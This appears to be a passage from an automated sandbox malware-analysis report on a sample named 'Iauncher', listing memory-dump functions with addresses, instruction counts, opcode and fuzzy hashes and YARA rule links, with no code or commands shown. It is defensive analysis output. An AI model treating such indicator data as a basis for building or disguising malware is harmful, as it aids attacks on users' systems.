                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: baf824dca0eeeed0971f83e3a86469ee92230e38c5e5a4a211dd4a3814178641
                                                                                                                                                    • Instruction ID: 853d7e5e00cb032f2c392ac551d9af2a60b5df1e1f32ed1f482d732a4e1a3a2f
                                                                                                                                                    • Opcode Fuzzy Hash: baf824dca0eeeed0971f83e3a86469ee92230e38c5e5a4a211dd4a3814178641
                                                                                                                                                    • Instruction Fuzzy Hash: 5F316230A046098BEB28DB79C450AAEFBF2BF88705F15452FD446E7250DE70A8059FB5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA8ED0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cb27cea1e67b9a475e21d306573e24f9d17ad6c3535bc4dfa7bf401fec177f6c
                                                                                                                                                    • Instruction ID: 844fdeb58cc1ad172c0e3aa13509f9125f74542b6bd8ed69575275b1b0a487d5
                                                                                                                                                    • Opcode Fuzzy Hash: cb27cea1e67b9a475e21d306573e24f9d17ad6c3535bc4dfa7bf401fec177f6c
                                                                                                                                                    • Instruction Fuzzy Hash: 1631A6B6E1021AAFCF01DFA8D9809EEBBF6BF4C310F15452AF914B3210D73199519B90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDCEA8 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: aabbc321d76e58960a619234dc10c2018d1da4461d2c04333ed9cecde86c24e8
                                                                                                                                                    • Instruction ID: ac244e67488fd12da59a7a5ee6d675bf1119903c911cca27c7866930bab9f99b
                                                                                                                                                    • Opcode Fuzzy Hash: aabbc321d76e58960a619234dc10c2018d1da4461d2c04333ed9cecde86c24e8
                                                                                                                                                    • Instruction Fuzzy Hash: 9F31A2B4E002199FDB44DFA9D984AEEBBB6FF48300F109469E511A7364DB35A941CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD8F50 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 389d6157e317b9b6531eaf7b5ce41cb4dc44d1c2374bf957e2adb036bc978dc4
                                                                                                                                                    • Instruction ID: 174f441053c40221eec4e68317ffb547b3db01e225c43da3b3fd722c5f6ea561
                                                                                                                                                    • Opcode Fuzzy Hash: 389d6157e317b9b6531eaf7b5ce41cb4dc44d1c2374bf957e2adb036bc978dc4
                                                                                                                                                    • Instruction Fuzzy Hash: 7231EF32D14B0ADBCB01EFB8C8544E9F7B1FF95310B118A5AE59967221FB30E695CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDBB90 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1ec5abc99dd53adec2803bfc12440c5f3c634d03d7b3e26518e7313b0fd4cf82
                                                                                                                                                    • Instruction ID: 9a73de5049dad0b3e8ebcd40503d7941913850a06030f341a2b6854de162fc04
                                                                                                                                                    • Opcode Fuzzy Hash: 1ec5abc99dd53adec2803bfc12440c5f3c634d03d7b3e26518e7313b0fd4cf82
                                                                                                                                                    • Instruction Fuzzy Hash: D821A030A046198BE728DB79C450AAEFBF2AF88304F15852BD456E7390DE70A805CFB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDCEB8 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e529710ca4be4d2c64f17e706f2e70908f798fcedc94979eb8f0f619fcd0a839
                                                                                                                                                    • Instruction ID: d6ea5fc4453507d1aa3152788a59b2976c6e9bc88f16d8e6638f814fdd678c08
                                                                                                                                                    • Opcode Fuzzy Hash: e529710ca4be4d2c64f17e706f2e70908f798fcedc94979eb8f0f619fcd0a839
                                                                                                                                                    • Instruction Fuzzy Hash: 3731C2B4E002099FDB44DFA9D944AAEBBB6FF88300F109469E510A7364DB35AA41CF60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD8DAF Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1ef4058fb08eeadfeb511173c87d8858888af0aa471baaf611e43a13b18100c3
                                                                                                                                                    • Instruction ID: 84344cb265c5bdcfe34989a75a389749f74ba88c96c79edb63b32f9670db9fcf
                                                                                                                                                    • Opcode Fuzzy Hash: 1ef4058fb08eeadfeb511173c87d8858888af0aa471baaf611e43a13b18100c3
                                                                                                                                                    • Instruction Fuzzy Hash: DD21D3343406154BEB04AB6ED4517AE73E7EBC8B08F14403AE686D7788CDB9EC1297A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D3D514 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674779733.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d3d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d5b90fc15124a79d5c9a0fc7e2a5178f4ffe993e0b43c63e4fa16075f0a330a4
                                                                                                                                                    • Instruction ID: 6edbf9625c71a2d6678df8301ffe95e6da4d6fe27c86c02225bbadb43c4c68a2
                                                                                                                                                    • Opcode Fuzzy Hash: d5b90fc15124a79d5c9a0fc7e2a5178f4ffe993e0b43c63e4fa16075f0a330a4
                                                                                                                                                    • Instruction Fuzzy Hash: 07210372504240DFDB15DF14E9C0B26BF66FB99328F248169E8490B256C336D856CEB2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD8F60 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: eef440500a22afe95952aa09569da23e5de3954e994f3d2a3a06ebeca40e98cd
                                                                                                                                                    • Instruction ID: 0b7760e24fb574408f1251f5825621b8d8cb92ebb8c5161a39b45cab6c3afb2b
                                                                                                                                                    • Opcode Fuzzy Hash: eef440500a22afe95952aa09569da23e5de3954e994f3d2a3a06ebeca40e98cd
                                                                                                                                                    • Instruction Fuzzy Hash: 3D31F132D14B09DACB01EFA8C8544A9F771FF95310B118B5AE59967121FB30E6D5CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D4D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674923444.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d4d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0361a65ae0ba4329d54c3e1bc013791be4fd3c8baee5ad31c60ce36bc2222228
                                                                                                                                                    • Instruction ID: a77aeeaa0fc7cce1b6981408b3237529556e5d534cefb0e12fa0d4f91a3acbbc
                                                                                                                                                    • Opcode Fuzzy Hash: 0361a65ae0ba4329d54c3e1bc013791be4fd3c8baee5ad31c60ce36bc2222228
                                                                                                                                                    • Instruction Fuzzy Hash: B5210471A04300EFDB15DF10D9C4B26BBA6FB84314F24C6ADE8494B396C3B6D846CA75
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D4D01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674923444.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d4d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 08b7103039688a93eaf1180d1b1cb77dc69411996d77657a2ce19ec943864183
                                                                                                                                                    • Instruction ID: 16029944ad77656b2770deb5d7f2a6e95845dd804a593ae487045c7dbafd959d
                                                                                                                                                    • Opcode Fuzzy Hash: 08b7103039688a93eaf1180d1b1cb77dc69411996d77657a2ce19ec943864183
                                                                                                                                                    • Instruction Fuzzy Hash: 1A21C275604344DFDB24DF14D9C4B16BB66EB84314F24C5ADE84A4B396C33AD847CA72
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA7750 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b33d7d7abe4503e77d3093065c67d8f92596a4b77f48c1d6ac68876730fc2e3c
                                                                                                                                                    • Instruction ID: bac9d863845f773871f5c72716ed3df3fae7c8437974a8f47ff626d6e5c5bda4
                                                                                                                                                    • Opcode Fuzzy Hash: b33d7d7abe4503e77d3093065c67d8f92596a4b77f48c1d6ac68876730fc2e3c
                                                                                                                                                    • Instruction Fuzzy Hash: E931DFB5D002499FCB14CFAAD885ADEFBF4FB48324F14842AE919A3310D775A941CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDCD90 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 362fc79715ed8fada1e8280253041a0bfbf4984c138f6b8326dc8eacf750d011
                                                                                                                                                    • Instruction ID: 0cd47907823ac096c4dd06a837c49796472719a615ec3af95ffcea5c079c557f
                                                                                                                                                    • Opcode Fuzzy Hash: 362fc79715ed8fada1e8280253041a0bfbf4984c138f6b8326dc8eacf750d011
                                                                                                                                                    • Instruction Fuzzy Hash: FE1154757105149FDB18CA59D844D9AB7F5FF8C310B1540B9E509E7361D631EC01CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD8DC0 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 72276a6694f56be2c9a85a0283d74f9de87721c7f1b72ab75d2cac29eb49ee49
                                                                                                                                                    • Instruction ID: 5b75e1446538da1d72dab8af73d550ae10c4a76da6ebd66c2ec3b15f6cfa3f36
                                                                                                                                                    • Opcode Fuzzy Hash: 72276a6694f56be2c9a85a0283d74f9de87721c7f1b72ab75d2cac29eb49ee49
                                                                                                                                                    • Instruction Fuzzy Hash: 391173303406114BEB04AB6ED45176F72D7EBC9B04F14443AE686D7799CDB9EC0297A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA7300 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c0e2d559e3618a05a80eabff341d008ad9a28068a6f8b05fca180e3fdb266fa3
                                                                                                                                                    • Instruction ID: e0cc8971661a5569fc6e0aba07645b58b05e507b1cfcf9141c8fab985f17352a
                                                                                                                                                    • Opcode Fuzzy Hash: c0e2d559e3618a05a80eabff341d008ad9a28068a6f8b05fca180e3fdb266fa3
                                                                                                                                                    • Instruction Fuzzy Hash: 4711D6B6E0011A9FCF01DF94DD506FFB7B6EFC8210B054816F854E3251E6719D2597A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D4D005 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674923444.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d4d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 53906468979d10763d79783cab55798dcba57719d95d799bce6edfc53a5c47cf
                                                                                                                                                    • Instruction ID: 6cdc4722b9912b0f26535a3f0fe376f6ba82a29f7b08ce7a8fd84768ec5460ce
                                                                                                                                                    • Opcode Fuzzy Hash: 53906468979d10763d79783cab55798dcba57719d95d799bce6edfc53a5c47cf
                                                                                                                                                    • Instruction Fuzzy Hash: 932162755093C08FCB16CF24D994715BF72EB46314F28C5EAD8498F6A7C33A984ACB62
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA8252 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3b9834a847563ed083aa9448965ff8ad448a0d78d7e8a2222e6d0c3450be23cb
                                                                                                                                                    • Instruction ID: 91ec57e594e250af5fa6026e25e31a04a887f07c5b292dc9c0539e1bb47f41a9
                                                                                                                                                    • Opcode Fuzzy Hash: 3b9834a847563ed083aa9448965ff8ad448a0d78d7e8a2222e6d0c3450be23cb
                                                                                                                                                    • Instruction Fuzzy Hash: BD11C832E05749CFCB04DFB8D4816AABFF0EF45314F1482AED9599B212D7349A46DB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D3D50F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674779733.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d3d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                    • Instruction ID: c52794b4122060b3bdacf65b1013e966712a28d1a812e89a8fbb7b9e03ac6af9
                                                                                                                                                    • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                                                                                    • Instruction Fuzzy Hash: C911E676504280CFCB15CF14D5C4B16BF72FB94324F28C5A9D8494B656C336D956CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDFED1 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 16a96796d58bb98b2529df69807c5fe60a119b8ab71266b44b6b47ffdcbdd2b8
                                                                                                                                                    • Instruction ID: a2c35d5bbc09ca78903c5400469ae24aee8963c9af48e6e83807802c525ef4e5
                                                                                                                                                    • Opcode Fuzzy Hash: 16a96796d58bb98b2529df69807c5fe60a119b8ab71266b44b6b47ffdcbdd2b8
                                                                                                                                                    • Instruction Fuzzy Hash: 4D11A024A042568BCB04DFA5D8806FFFBB9FF89B00F00405BE505EB261E7749A45C3A2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00D4D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3674923444.0000000000D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_d4d000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                    • Instruction ID: c7cc1a7c7e9e2e874e472e8f47387a8e758aaba5dffa582804a863f699f0eee6
                                                                                                                                                    • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                                                                                    • Instruction Fuzzy Hash: 8D119D75504280DFCB15DF14D5C4B15FBB2FB84324F28C6ADD8494B696C37AD84ACB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDFEE0 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5bfbd54e4b35a05475430abb82c1bd8449d80d1dbe48841b228434e7bd361089
                                                                                                                                                    • Instruction ID: 1d5b500ce719abaa41b6dcaad3aaae9d69ea64c5de9cef7695739631262a3fec
                                                                                                                                                    • Opcode Fuzzy Hash: 5bfbd54e4b35a05475430abb82c1bd8449d80d1dbe48841b228434e7bd361089
                                                                                                                                                    • Instruction Fuzzy Hash: EF117334A0062A8ACB04DFA5D8805BFF7FAFF88B01F10441AE515E7250E7749941C3A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA3564 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 925c9b126c3db4206d2bc0ecccebbd5184d3ccdc28069f4e8f7768862402b180
                                                                                                                                                    • Instruction ID: b4b8901c7c0d3f196184b166afa5446d8e162eb51c804ec3d4fb5dfd09bc1fe8
                                                                                                                                                    • Opcode Fuzzy Hash: 925c9b126c3db4206d2bc0ecccebbd5184d3ccdc28069f4e8f7768862402b180
                                                                                                                                                    • Instruction Fuzzy Hash: 9611E4B5D003499FCB20DF9AD485B9EFBF4EB48310F10842AE919A7250D774A945CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA56C0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6d142797526559024cae839baedd5d2ca20338268369894f9112ede8046cd8a8
                                                                                                                                                    • Instruction ID: b8b966f776088c1f74d140fea870d8155fa07e71969a06d6bed59958fd1e8767
                                                                                                                                                    • Opcode Fuzzy Hash: 6d142797526559024cae839baedd5d2ca20338268369894f9112ede8046cd8a8
                                                                                                                                                    • Instruction Fuzzy Hash: 9611E4B5D103499FDB10DF9AD485ADEFBF4EB48320F14842AE419A3210C378A945CFA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA8561 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 66667928a373a47a03f02163f59b47e089ba19e318ec215158625eda6d051e09
                                                                                                                                                    • Instruction ID: 5b3fec2ece118ed10a05287776895c1f73323b76aca59cd5c9c49088f32762c7
                                                                                                                                                    • Opcode Fuzzy Hash: 66667928a373a47a03f02163f59b47e089ba19e318ec215158625eda6d051e09
                                                                                                                                                    • Instruction Fuzzy Hash: 29016776B00119AFCF069F98DC159ADBFF5FF88210B058066F504D7261F7358E119B91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA5AD8 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c776daec52b9a02939d9e3f668ad6d7c3e48e9049b597615cbab9c72ea160467
                                                                                                                                                    • Instruction ID: 22e089d6f769c9df6a107d3072c083bb344c6effcf6143a9fb9088ce9e2d8a7c
                                                                                                                                                    • Opcode Fuzzy Hash: c776daec52b9a02939d9e3f668ad6d7c3e48e9049b597615cbab9c72ea160467
                                                                                                                                                    • Instruction Fuzzy Hash: 4001FD74A542849FCB06DFA0E8815AD7FB0EF8B210F2185EED80AC72B1D3354E42CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDDC70 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
